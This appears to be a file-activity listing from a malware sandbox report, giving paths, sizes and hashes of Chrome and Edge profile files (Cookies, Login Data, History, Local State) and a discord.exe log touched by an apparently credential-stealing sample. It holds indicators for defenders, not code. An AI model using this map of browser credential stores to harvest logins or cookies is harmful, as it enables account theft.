2ab9098ad196a17af2432d276cbd8f116c28f3f32116950912439d2155836398e3ad8a5a76942cc9d66382b626c1e8891a4bf31c3dbcfd32c52ded247a8e10b0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
12KB

MD5
c50f4457540baf533534de8be69f7c45

SHA1
7e342984e6accaf13405fb93da25104681b82186

SHA256
1e199bb8c6dcae83925b021d63706425335d2a9de2ac1acc380dff002915e787

SHA512
67a1e1d6481de9bf5a8adbba4f595011a8e055d7832f3ea8aed09d52163256777b68ae5b671fe6724cfbebeaf64f44ef1b93befb5ef998b3bd35b302164212d3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
12KB

MD5
69423d773334fcac4cf50dc75a5e084d

SHA1
d09e33975bfae35d8d31d6497507536dcf43e787

SHA256
ca134e64d338a6f18685bc03ad2b14bc49771f33ca346f05af448622c63ed81b

SHA512
8993739b8112f5eb011ccf54324fd48f30249f81f5080f4b67177a1c81f72a668053ff1b28e55d62228abd3e9019a0f1ea9e61dd3489e4c29c4d566161a7c844

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
12KB

MD5
b383fba2bc583c5aa2625de1712d65c4

SHA1
f1d2e73c90fac7cc5b69e466594ffe05e4e7034d

SHA256
f70538c66829fd737a87d17b66c52ea25675dec5c28fc45cd860367939c3f809

SHA512
c445e8a727c40add9e9e687880f718c1cfffbdbfc6ba6789759dc19da55bb4322b60d3f048d7acad9caea7f780a08b5c8611c7f5b8862e6e7085626154335064

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
12KB

MD5
5535e309018ebf3c69ed203dd03fbe5b

SHA1
34c9b1807d7c41a6c5a309f6455b60f7ad25b9eb

SHA256
58decc229e9c740a72073b17907e09d40ec9c559f7f5dbe8ccae895e8fb76e6d

SHA512
504ac3a11d7765a126c5b00186bffc92387b0b26b732f134b3223d6f7700f0e5daa3cda4014aaca250ee51a2d08cf3ed5ad0b7258fc808e9a47e957e8691762a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
12KB

MD5
89e5ad9dedf3d767a4baefa1c17a121d

SHA1
28c5c44cdc4a131841f5d329ebc2feda8d6e7f91

SHA256
9acc3cb0c5561ec2da8dfb16532e14c72a2b519bd3bd0a9c871ede93c865d08e

SHA512
a4e7430c45782377e27a3c09de9f4b7632773494f95a1bf2f9d639a8b6212fcfc0f0b906da2fe10d3d3cd080a9300152f7cd0144f0cf5921c6f5279436ea6570

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
12KB

MD5
2211af69b615cfac258263be6436e973

SHA1
e7398a307e716041770cf405456a50664cf6a87a

SHA256
ace091de2c025217edb22eb1e3aa965767f45f75372a81ababcb01f3642b083e

SHA512
0fe2ca186fb9ac058f82ec3808067d9e3bd4f693aafc149c612dae361b52700c03abdb1e8ca8b2f2ae259861663045de31099cbfda6e26bd83ae4209d3569ec7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
12KB

MD5
6dcb637924fff9c2814768560960231d

SHA1
d23507bf3804c384fff88d448e01f29a087c8c74

SHA256
0c581b59e3ab90313e1711fd06434e3c940930eb240adcc1dbda0fe955e4ad91

SHA512
7d5f5b468b9efa4ff2c573b651d784b967eecb464ee3e4334d654cb39f90ff56d00f78e216d7760177cabc80bda5469694721cee22d6c9125b76ea610428db88

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
12KB

MD5
4c3230202b6384274faf867875494cf5

SHA1
fe49de6749e238a93b00ec4c945ccad35dbf9737

SHA256
b9b5d42821b32ca0b356c1dd43ad649c44983e0cea69fd19216b2f1ef15e6a53

SHA512
03e5035c34f6cd35319043f2b6a39e5a59d338a2b2847db718a957b4c5b48793920ecc75e9e5fa331d4fc0cccfd9cbe6c0ec730efbac9a3949d1faaa1629c92f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
12KB

MD5
67421534dc368a17ab9cff3605f94736

SHA1
6f4518aad111ab98a3bda7429684c91bc1db6c0b

SHA256
ae5e27ef1bcc4fe893db1878e2bb5a8028141721911c3eb44e7c60e8b6b396c2

SHA512
e2c912260c61f3963f7d633ad1f9bb196c4c1ff05ad811c5adcb94d01f877f5231da3a3e89f8bcd517a2fc93570e3198eba13c6f30fca3aeed897b71f85d6154

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
12KB

MD5
90f86fe7977427184bd9b3717c15ba83

SHA1
072401a88b1b90ae62faa9390c2c2b4e5ecbd51d

SHA256
44df4a71171781db1c21262dd0684c314774c80e4ce7b604fa239024f9c31452

SHA512
c5c70c2921c942809f48bd2ee2838f2c10dbd022d447af7164e8c546d8d23bd29c10c45a8b94dec2b04723063bc67cd2e8c78b4143907ef0d1b20b0e1efeb409

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
12KB

MD5
427bb550466dd15102efdddeba7241e2

SHA1
60a2827d728210440607e684070923f2c5da08a7

SHA256
5afd9b0591df987bae1e121b74ad91ebf6e7b08fb45b954cbac480b31b0860f8

SHA512
855adb3f5a71d75d15f15321863af480d1d75dfc3096ce0e9c0c4c6fba49da004801bd76e8bafd78c1daa41dc36ec0d7961cb4526a3d8d5768076686fe7b66dc

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
12KB

MD5
574c1a27a2fc51b06bbee308a32963cc

SHA1
7f79ca40da924747eadf419ef1561ddbf7d73dad

SHA256
0c8a428bf92d4e8423f068a4d132fa6cfdb45aa24fe2a978999a4d4e46dc2695

SHA512
86a4c04a53188337cc2795a529b808601911ae9ca860991b2314a75a2cdad78e430c9c37ea0bbdaad49b10ab910cff16ba3266ebdac664e6bfc82651ef9df8bb

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
12KB

MD5
ee369aba582bf830939151d8a2ee315c

SHA1
c52e28a3c65fc2fb153b738c1da3f2adcd091f25

SHA256
624ccd57d39dde1832c0e408ea7309ec5c98da94a29607b2c5b502bde21e69bc

SHA512
c124874a70faaf90f17cd562a4285710b27e108c84cecc278a90b2f20209b3688c5b12e3789617543055240f5853cc4ee7e636900b55bb5a3e656d39343a3609

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
12KB

MD5
b9d24da4c23fb5f41903bc2af52a30e8

SHA1
608e9dfd4196d801a4a135b5303c86d3cae40eda

SHA256
e60366c5adba269458cc4108daab6f19ce68f982ecfa3c3ab742c561571eebfa

SHA512
1de8a5c5410427e3697e718e530fcd701340a89226b5d9c95dcf52b0548ebdf36d748eb0c9064cc4892aad71ae45402ef10b31e3ded0b2d9a52ae985c682902a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
12KB

MD5
0a7259a3a6eeb2959c789835e01565e2

SHA1
222fa01d1447e1a56ccae124c164125a91c4e340

SHA256
20619a2d5a969010ca3ab80fed30c6bab30149ffe9babd11363d47f958de469a

SHA512
da05cc3f8c15d8f2d25ddff80087e7471d5dd0ef0b2d9c504e3ca8ae023feaf764a3d4e562c4b0bcdc7fbe7ae7deb53579a4c9268604fda26781b7f17ae54714

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
b298c9d6595b565d1c53bbfcc0e44c96

SHA1
8160fb48dd5db596d4f610462b8d6893a4ffd388

SHA256
de22f00d4521e10c6697bd16c2f49d363e0b2a25c3ffe6e72058a2bf93b01295

SHA512
83a6691024bc5184b6fd85cfaea9dd651956de1b8b8585cc1c58c73dcd551bcfaf2ca77142400a0cf2ac77c7a45b54e58c4ce8cf3cf3cd10bf37bb45fb6c2090

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
96B

MD5
eb609fae9da8a771c4f747e2c2c0e6af

SHA1
726609a52ee57963e01710530f9a2b5d6d402217

SHA256
c4e38d3fece0e109c01c806b4a15feb1b50307d90638f13be5db0578bb2d1ebc

SHA512
d59dfbc9659c02dac48fe3cf893dc66af758c6cc8654eb43befcf7e592659d747286bd8bbfb7921130f0f84aff396a6d4343bf2c113d240b2d6f2ddf420732f6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
72B

MD5
ed84f68d5ab71271a6fec5095bf68662

SHA1
6fda004da473d06ed9891e6c74699931875bd074

SHA256
6a977bed090697d95f9a7caa1f3e4fef0b2a75eb2121bb214ec38c62dfa35783

SHA512
5bf81a334530b14d96f83393b816b0e5e70c8c0c7453b23e07e1f93314ce981d78cbf2586ab179d254febeba5d557d1bdcf65cef854ffda2bfadec6247df76dd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Data

Filesize
114KB

MD5
fd3e8a530c5dac47f6eed7e2da5866df

SHA1
80a95eae75b75a071e37317365df33411b0737e4

SHA256
2cc3fa1f91acb46ed1d53813557a2b1c71c866ced5051db15046894df23efa47

SHA512
3a2e60fa8771cfd210f3e3356ceacc1298a5c4854e9c940a239c073497c4db7451e1a40b467f861355472c1b4d9accf742d4c0cd0c78e247f01c2839c156754a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
122KB

MD5
b14dc63564b78aa5956df2bbc11eaced

SHA1
57282ddfe2845d7932b9f34385d28942c856f0ff

SHA256
96cd7f2658fde280547f94d30b14116a6a298c92a922f04ad100203f863cb13b

SHA512
a42fe21a6c9dcb29eac948c5bfe6701d1d7923d634f6e16ff62058e2c0daabe057de562bb7cfe45ff23cd926ee87f5cf118bbe8c6a7ce1a09546764e20c90857

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
233KB

MD5
d2dbef9f8747872011ec3a79820e3a41

SHA1
c3e3967c844c0abbad7720c50d8018c04fdd9a90

SHA256
e310b29687c65a951dde81e388b98aa10d562f9cf100f9d550ad619ca9d1f068

SHA512
1dbb2bf56284d751ec1668826352c9bbe8ec11f5672197b72413c351ce4d8d03cb8fb010d065006e99ff5b7552e89474abb924cc337bb253e2a1710f014e933b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
233KB

MD5
21ca5a904176636f0f05de700c896a08

SHA1
6c99b42ad9de8570f5edf295394bdba616178a14

SHA256
59c1119f9af7d7d7456d21d42bb4c6f1b7dcde0dfcfa93d6f1f82dd85a24a85c

SHA512
509c24b76ee135ac9269bd8fefb749e73e84995cdbe7ea3e99585e935556950726bc1d115b3ec3a98ceb16357498e497c8ec121dace32b50cc1034e64521e8a0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
122KB

MD5
5625a3fc3a72e3ccdd31a35580c990e7

SHA1
12ce761f780a2429cc797ff0046c9d8e4ec461ea

SHA256
eb104b81ecef2e24e27972b06fe4a70d1d1e74c469b1172f8147b5341330d017

SHA512
2952422ba94751e8e76e6132d33aea0345e2781650a28946c164e92180b01cd98350c827e34e907e381002af34fde0451b86130feb8d7c51d66ce07c455b0e8d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
233KB

MD5
04057b7509fda3e46072364cb3b3f9e6

SHA1
4f5334f7464ec08d5b19f73b4de6305fb0de7207

SHA256
f1c25c9a47a000ab571af95a53a1435b3095e02146d55d744c5e68ff29219fca

SHA512
6456b7242dbc1ede3976399fc189318717a8035258d8fd436578cf6ca6972e701fa9cd34c4da0b296c9b4224d0f582227d7214a395600c13e7664dd15f80cd9d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
122KB

MD5
3e92353ae28f744ac0880e419ca57d52

SHA1
9dbdb65920857c7979e8eaf48bb05700ae17ebb2

SHA256
9d2028c7e00b7d0bed80726bf2e2dc2a847d32e2e00cba25e93bb9f60233cf89

SHA512
476925dc3e5caea78caedc5fd1211092c7b0995bf0f8003e7a7cf7f434a02ef4ec981f3cfd5e259a13b2dcaf22fa994bced26a6afe9a388ff9f80226f268b462

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Variations

Filesize
86B

MD5
961e3604f228b0d10541ebf921500c86

SHA1
6e00570d9f78d9cfebe67d4da5efe546543949a7

SHA256
f7b24f2eb3d5eb0550527490395d2f61c3d2fe74bb9cb345197dad81b58b5fed

SHA512
535f930afd2ef50282715c7e48859cc2d7b354ff4e6c156b94d5a2815f589b33189ffedfcaf4456525283e993087f9f560d84cfcf497d189ab8101510a09c472

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\discord.exe.log

Filesize
1KB

MD5
b4e91d2e5f40d5e2586a86cf3bb4df24

SHA1
31920b3a41aa4400d4a0230a7622848789b38672

SHA256
5d8af3c7519874ed42a0d74ee559ae30d9cc6930aef213079347e2b47092c210

SHA512
968751b79a98961f145de48d425ea820fd1875bae79a725adf35fc8f4706c103ee0c7babd4838166d8a0dda9fbce3728c0265a04c4b37f335ec4eaa110a2b319

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
c854f49f895937885750f43f8caef7f2

SHA1
aa91d3a8124161433f93ba702cca385651d19df8

SHA256
7969e2b6a7a24fe44c4c2a66c00df433fafcd5d2fc6fa6140b6bb9add9bcfdd8

SHA512
306b96fbee4785d81755587b078e7a12b2ef7676856f3445eac834b977c76859a151a451585fe38b318b5531a1101fe117c5ca67902a199164c052e47c59b07c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
9418dbc68ddabdff3d58e787ce8bdc32

SHA1
a11587b54068a1fd6761638fc79bd65e7fb2f375

SHA256
0419dd79b566a990e66c6d871a2efa6172c17846343c2620615c12d7b34f4198

SHA512
c4ca246f747e2c39a0dcf714e12dfafc2e2ecd066ed47bf936553692836ed934d51a34b24673f6a3fc038fbdde3c18911314a8f3d4e90c5edd77882cafe5d781

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
c03d23a8155753f5a936bd7195e475bc

SHA1
cdf47f410a3ec000e84be83a3216b54331679d63

SHA256
6f5f7996d9b0e131dc2fec84859b7a8597c11a67dd41bdb5a5ef21a46e1ae0ca

SHA512
6ea9a631b454d7e795ec6161e08dbe388699012dbbc9c8cfdf73175a0ecd51204d45cf28a6f1706c8d5f1780666d95e46e4bc27752da9a9d289304f1d97c2f41

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
3d68c7edc2a288ee58e6629398bb9f7c

SHA1
6c1909dea9321c55cae38b8f16bd9d67822e2e51

SHA256
dfd733ed3cf4fb59f2041f82fdf676973783ffa75b9acca095609c7d4f73587b

SHA512
0eda66a07ec4cdb46b0f27d6c8cc157415d803af610b7430adac19547e121f380b9c6a2840f90fe49eaea9b48fa16079d93833c2bcf4b85e3c401d90d464ad2f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000002

Filesize
51KB

MD5
f61f0d4d0f968d5bba39a84c76277e1a

SHA1
aa3693ea140eca418b4b2a30f6a68f6f43b4beb2

SHA256
57147f08949ababe7deef611435ae418475a693e3823769a25c2a39b6ead9ccc

SHA512
6c3bd90f709bcf9151c9ed9ffea55c4f6883e7fda2a4e26bf018c83fe1cfbe4f4aa0db080d6d024070d53b2257472c399c8ac44eefd38b9445640efa85d5c487

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000c

Filesize
38KB

MD5
6f9bcbd9790889389f52578f0c27177e

SHA1
941fcd07ce8c21efda837ce99c2c0c532a153115

SHA256
f83e87421cda34647dbbbd00cd215a7f86445af8b2e550fc88413a757b89caa6

SHA512
8e20dee4c862b915790779e05fbb8bcb61d686c6f11f9bf74f459ebb97979e590c5fa4aec6bd83d9eaa68b2cfd6629144b4123c2a9c6757f777593dad313a0bc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000010

Filesize
93KB

MD5
98eeeda2146fe2f508a99a3b2b691602

SHA1
d47720301610a8f6af9749c7bacf74fa0b056c96

SHA256
3e0f1296b8add0cecaf8be602571adc17b95bb52403e18420e488dc52617b936

SHA512
a13cc797bdda916e35080fc4d0c0f8fdb413f5ca411eafe69a315f13744f5a6752ad7612c180f8356190ca68f325bdf7f563db9db873ab7c86ae4c12a128ea03

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1KB

MD5
fa0e8f41fee8e61451029de26b77c151

SHA1
2f75d554aa3cb705fffbe0f2798001454881ef8f

SHA256
26964ea527b7dd5739e433a9ec2248ede1e7385c45cd0a85674461f9d7ff54b7

SHA512
9a6e320fedf2ac1ec8d65ffe169b7cd79744add8727b47678a085a77e21b569197c842ee9f7059dc549824d3ada16cbe0ea7faafd42848ed77d93fbc5dea6c9c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
2KB

MD5
cee58669b6d089666f40d0d42b2ac1a8

SHA1
defca9aa636ac1b8a3f296b571ebc3e649425545

SHA256
440150d02cfff49c4798623564e7fe23f67ef228d9e192b96f28a487d89bb1bd

SHA512
7b8a9d0161740a4bb8be7d8ceff0621b944ac9da090c8e1795f4ddd1fd9fa562fd065c59fa12c828e553485e583ffc5fd45abb8db409d4892a567b7273a0c22e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
3KB

MD5
df7e76ffa5f8b0981a35e067ce25b5f7

SHA1
8005d9d41e78ba0b6f7ac9dc82b19c5351c4d5a4

SHA256
c893a9f931fe9cae449b1879d470e6d8a9e842aa12ac383ba3037d697b6970ee

SHA512
39f3bcad2cc9d78df2d231ad9b73ea60b0f7874f856e0c2d7dbbbb265b85672e8b0e75cddae680dd9d582377f0aadfa3bfe8def57256e5f95608a89e9517d8ed

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies

Filesize
32KB

MD5
feddf6a368bec4d09961628c35f368ab

SHA1
bcb260298aed0c5ef414577f3c75669e45ed24a5

SHA256
cbc3860d8f6249bcb0e13811659da8bb88073c8207b109a9fa6b6f4579fddd07

SHA512
75be49d4e8086957b71f6a1052de16313b2173329ee5e14b0d0db520a69bc01724cfd88277833843264e852b7b723656b1cc178547b8dfa904593a7b841ba5d9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History

Filesize
132KB

MD5
86438040a7c349a71a27bee1857b7800

SHA1
effae66f63c9a63a4cef068c9e85319878729504

SHA256
e71b9bd1fa1f32b2695373f7a3cd989ec1153c1734c2f86027a5571208c0e181

SHA512
6a9a25c5c2f7a2dae650c3953b7efe114c609a98cf3dfae1452bff94481565b7d5197916822121c80c73ad5c7afc80d0fcc69308b461ad90c6ca321d9dc1a40d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Login Data

Filesize
46KB

MD5
a678a5752b485d2c38cc4448001efb0d

SHA1
2ce754ae5f421e5b911f9eb046fd5559d6bb7f90

SHA256
8b516e2b6cf125d75b53e5b908b2db0e89990c30343daaac3274ad8bb5765515

SHA512
c8a75f61a9e0fe1c76d6ce0d9a91fcd3d3b899eb2433f3dd285d825f1572bd950be11783e34c29a8d6b499aa02ffb7b95f2d9a43e2cddfd72965028b589e8a08

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
3KB

MD5
2746d3d48e07828ad054f21eaa059074

SHA1
c8551d2b6f0d2cad6d59aa2e53b208b13aefacda

SHA256
f741304e96f7763f0299a356eca1987625ba4cf9082f166004658890528abb05

SHA512
ea390120756cf080cb4617c38f013016d47aff3e2795a0fb73a240f5e39af2336e6a2932d6da37bfe6e9bf76dedb6680373564dc8e23d61dc54e2f4c0cb51b56

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
3KB

MD5
960ebb9f36804a1066056ed24753f062

SHA1
80d032ee489e461b37b62dc6507b0c277b92472d

SHA256
7e283cbb87d60a215cf562ef34b2007d3fa6bedaa1d9a09f132822fec2a230b9

SHA512
72e19d5bdd8e28f73706a9d12b9796cae076ab0e614fabda32e7a5cc543ae2358103b268f42a9e8ff8e247733f82a952d51e3b554ddb865e676094cc82e42b75

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
5KB

MD5
bc9a585a8f9a55b4c308d7618965b342

SHA1
eb57351b2f92c0a20835cfae1529823b94b712e6

SHA256
a6af8cdc57777d66ddec5644a0d82db15cf867e2252b8b59d4d558bd86a1dd58

SHA512
49bc18e57f0b6c95b925c6a9bfb05397fcc5035d0db40c6fe125e7f2a43a423115557597cd0cbc1796c55f100b4f5baa05c8e7307f9df8b8f385e37935d67e07

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
266b569f807fb4bdcf1350657a5aa38f

SHA1
00d902c11225f232700d77a3094794b29b67a3b9

SHA256
4a5d6c191d7aa92e7853a1073715ddd49caa59cb6821302d18c797a9d2c71b3c

SHA512
3f2d97ca3ef0d0a897ee40e7781a2820e45350e675c4e25bf410e3bd4ea4ae8b059c3f9e153070bead04552830cb5c4161dd66e34c8ef096351131f747d747ae

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
e1885648c6df446ce5840c720f9b2a55

SHA1
52846b9c25ea074493dc7ada0a9585a7eb2ca7a5

SHA256
5f81c795d77d7a8e0ffb59acd9da1e610352c35e5ef56b3517e4a9aa86eb10fc

SHA512
65475c4d1d504b711795ea7d0c248f36fb3717b4cdf8cee98ceb7f3638c136a7fe6348dad1bb0651e21cf744fbf1dc216d051e04477cee19c86e1844fca3e1e9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
09313534e6fe302dc9a1a8d3d4fd1450

SHA1
b84cf35cf2ad081b0dba4d570db351b97fd7721b

SHA256
faa7f8c1b29f8353f539f1f2c29492fb4e1d34162254341fb27e80ad8cb76e32

SHA512
f59793c4f4140236a184ff875a0595cc85020596b7ac842c4e6c252d9e17144f2a38b260beb3801784a09b51e113f44f320514930c26b82796ed81e2ce72345c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
1e113f8a389c4e65c66a64954d4b0fe5

SHA1
7ec62948be9832ad7a58f5c8c945db3bcadc0ddb

SHA256
09f70de5ce23bfc4669fd1163d930621dd95e15c3d2b35c38c02a23015a1a7a2

SHA512
52bf7167ca81d9cbfe4a1e3dc03f7b4ae62ea97cd87401cfaaf4f6c793adf36131e8ab3681258e44962b94147593f0f1091812a98654ca2d8c230318bd1cef2a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
f38df0aabdc88d9c4ce6daf8312bf94f

SHA1
ff1d2d0ca8b121de4e466fddd6b6ed8bb2a9d39b

SHA256
3ddee2c312f903209e56a7b6be48eeec6f9a20b946d5a1a5d8d4c59bce1ff588

SHA512
4b91a0c60d3092a3a337ac5c1ddb2b2ed8d8a97db03b7370b39f506edf75b26d181d93ed2e236c05bf5d56e8eabe5ac1ef1533b243d8594560a651f7d307d46a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
5461fb6974c1be9049bb7ce6e49d41a5

SHA1
465002817c5aa6765596406875ad05453dc068bb

SHA256
78d18f324af9de84573a0c204f28c56e55b308b5e483fdfee7b72c2378d48e04

SHA512
c3e9d3a6d3c692b964c7986fef89408444b8e73595074ec50959b4f3352d1f37c9b125d4b782d70dbb5f3eae439566d9a659daa18b25d403c13a255d00ea1c16

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
b20683e93276f6a4387847f458de7272

SHA1
92b9b96f4670e655969ab3442b4786acc4d66a81

SHA256
8d2efcae2bd0152e213726d8825364c0200b761f5a73807361f4bf463ab80f62

SHA512
b183afb8e2dacb93472ed4f8232427a69eb3bef2d5dafbfdf95444be58b684793626b073517c13f5add2f0fcf20f38a890a446068124b8bb3f7e675c040fb7bb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
6374bf656c30826a410b8ba7b1c81a36

SHA1
610fe2639ed97096163fbced90e5d1c7e48bf82e

SHA256
5218f017412c25340cb1d4c604d8342201d9ab8995507b205df2e55bafca34fd

SHA512
38dd1c60082ce789db1faeaa631ddecb7e78560002d2647cc436b40f63c2c2adb04c5825c938ba287d46840e30da2b9ad4679f43260956387a6d25d6ef507c9c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
96B

MD5
bca487ed1d70ac3e817a78f8c36a4fd0

SHA1
25e79cf3e62aa0d13e460a7b5841c3480ffce851

SHA256
ee2d4c725f70c6afaeac0a1755c10d5c5272438206c3b6f91538ffc7b25bc6e2

SHA512
c19cb9252918df3d41cd99f20da78814ea70d271be01cfeae5b9d54457af0fd0dcfd2f4b930112fa0a28fec6494f0ebbbf569f9ea489237a8ce259846996e5cf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe62e4bd.TMP

Filesize
48B

MD5
fb9e495dc2a1e2112f7a03b5f34bf8ff

SHA1
0dc3386fdd4c5ed657e19a319e8e14c7dd597d8b

SHA256
38d66dc827a955432efaeb425f9732f1f82385bbf67aa36aa29becc590418c1f

SHA512
4e374961e3f091e26fea70e9a892da0098ac1d08b6dafb37b756d467f6cdcd90e97777ec88d2b3b9f600be544fc9bceafd55f9a96bc65ffea128ee401f98471a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
370B

MD5
cab2c576557134385503939ebbc69164

SHA1
66d3c1af8c61214a566e11a56a1a1f9e74958422

SHA256
9cd6b50c94d7655f582caa06af1e5217cf183f325551db7b6a91d686c4fb3f6d

SHA512
592e3ac1479d3f94a0f8b39ca5e25e2ed8cfd6eaef44e9b97115f93fd51a17abc2d2e44bfceba328ba217fe5fcee6fc415301036b17fe4869acbce6faffef0a0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
b8bb6a088603636746a78e294500e957

SHA1
45d5177c6e35f1c3089869610ebd17b0413ac2c0

SHA256
e7a95b43f9e6e6f5c95a364a097a1f42960d9839e1f2846b459eeb19080552d5

SHA512
32031ac60c82c04cfaf74433429a140b732fc7417f72ba83b7007aa880659b3932731eeb9e3b8acf065e884a3edc456f216326448897f4a3b3228e83fd67b2e8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
817932c9febbdf37ed27ad01a62f9c83

SHA1
5825758dd122bc61a8913703b289b1bf9009bd01

SHA256
87dee7503364f44c27d4cef40ea2bc15777651ac1ed16266edf225a653cecb15

SHA512
9b9e4f439c4935f1ac1887d5e6f181aec2bebcad822a854457db93f4f5fe36f5f64570aca05e388b75eecaf9d5934e979dad33b78a028ed83b0cee5f4109f615

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
acdb1bc561aae6f84c3032e70035917b

SHA1
8392b464c5f4e4f22b2d13f780f27f204521d8fb

SHA256
5d7932defa502198b9d40007d53ec6221f7819604866a8b1307de517ae6ead6f

SHA512
969e61c67ac20fdf3bd38dd77ab6dfb4287d96daaa7fc34f27cd2a5229cbc6cc40e270f13bab1aeb5d6b899167a316944932854d652e0f1e2df125b83d9d686c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe58fe60.TMP

Filesize
370B

MD5
46dbbc317e6b57499ec897754f16ed7e

SHA1
6d1f8ce6273431a872277659a144d606cf79381f

SHA256
90eeb05b2fb84946d3a9803f73f378944a13d77f2d6cae0275e4e7498479ca96

SHA512
0539e2591305b299f2473d42b3e4e71ef5c45794e69fda09f34e52437864e0753bc39747f3bc701afdfbf7125699ffb4b18501c9fb22a7278d8abe5097dd9536

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

Filesize
112KB

MD5
9ac9f733b0e84242bb5da202d87fbb78

SHA1
2e55fde5e434d01653e1552916d76c8600269e51

SHA256
83dc2d67e8f73c4ebdf42ff083bde61d8eadbaef5a30563259d94850558d3da0

SHA512
1d2943b5fb44289e74ccfdbec50c2e7ee528f59f13c5bcafaf95d19d937f02d045a103d4e42092f0aaae137871328d12b56de72b5f66d84acbbcd73aabd1b611

Download Submit
